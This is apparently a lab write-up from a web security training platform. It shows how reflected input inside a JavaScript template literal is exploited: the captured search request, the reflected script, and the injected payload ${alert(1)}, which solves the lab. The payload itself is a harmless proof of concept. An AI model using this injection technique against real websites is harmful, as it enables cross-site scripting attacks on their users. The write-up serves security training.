Reflected XSS into a template literal with angle brackets, single, double quotes, backslash and backticks Unicode escaped

Description

This lab contains a reflected cross-site scripting vulnerability in the search blog functionality. The reflection occurs inside a template string with angle brackets, single, and double quotes HTML encoded, and backticks escaped. To solve this lab, perform a cross-site scripting attack that calls the alert function inside the template string.

Approach

After accessing the lab, I sent the search request to Burp Suite for further analysis:

GET /?search=ichyaboy HTTP/2
Host: 0a5d006804e572dc89d1291800d50087.web-security-academy.net
Cookie: session=JBrXfsGM2SwopYB2mJruqnkxuP67NWbP
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0
...

In the response, I noticed that my input data is being passed to a script:

<script>
	var message = `0 search results for 'ichyaboy'`;
	document.getElementById('searchMessage').innerText = message;
</script>

Since angle brackets, single quotes, double quotes, backslashes, and backticks are Unicode-escaped, I used embedded expressions ${...} that will be executed when the template literal is processed.

By injecting the following payload:

${alert(1)}

I triggered an alert popup, successfully solving the lab.

PreviousReflected XSS into a JavaScript string with angle brackets and double quotes HTML encoded and single quotes escaped NextReflected XSS with event handlers and href attributes blocked